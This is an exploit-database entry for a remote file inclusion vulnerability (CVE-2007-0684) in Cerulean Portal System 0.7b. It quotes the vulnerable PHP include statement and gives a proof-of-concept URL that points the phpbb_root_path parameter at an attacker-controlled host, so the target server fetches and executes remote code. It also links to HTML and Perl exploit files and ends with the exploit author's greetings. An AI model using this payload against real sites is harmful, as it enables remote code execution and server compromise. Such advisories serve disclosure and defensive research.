Cerulean Portal System 0.7b - Remote File Inclusion

Author: Mehmet Ince
type: webapps
platform: php
port: 
date_added: 2007-01-30  
date_updated: 2016-09-27  
verified: 1  
codes: OSVDB-33605;CVE-2007-0684  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comcpsb07.tar.gz  

raw file: 3243.txt  

-----------------------------------------------

Cerulean Portal System (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz - xoron.info

-----------------------------------------------

Code:

include ($phpbb_root_path . 'portal/config.' . $phpEx);

-----------------------------------------------

POC:

www.[target].com/[script_pat]/portal/portal.php?phpbb_root_path=http://evilscripts?

-----------------------------------------------

Exploit: Exploit coded by xoron..!

HTML
www.xoron.info/bugs/ceruleanportalsystem-html.txt

PERL
www.xoron.info/bugs/ceruleanportalsystem-perl.txt

-----------------------------------------------

download: http://sourceforge.net/projects/cerulean/

-----------------------------------------------

Tesekkurler: pang0, chaos, can bjorn

Thanx: str0ke, kacper

xoron gider izi kalir, selametle.

kaybetmenin tiryakisi bir cocuk xoron.

Adimizi altin harflerle yazdik.

-----------------------------------------------

# milw0rm.com [2007-01-31]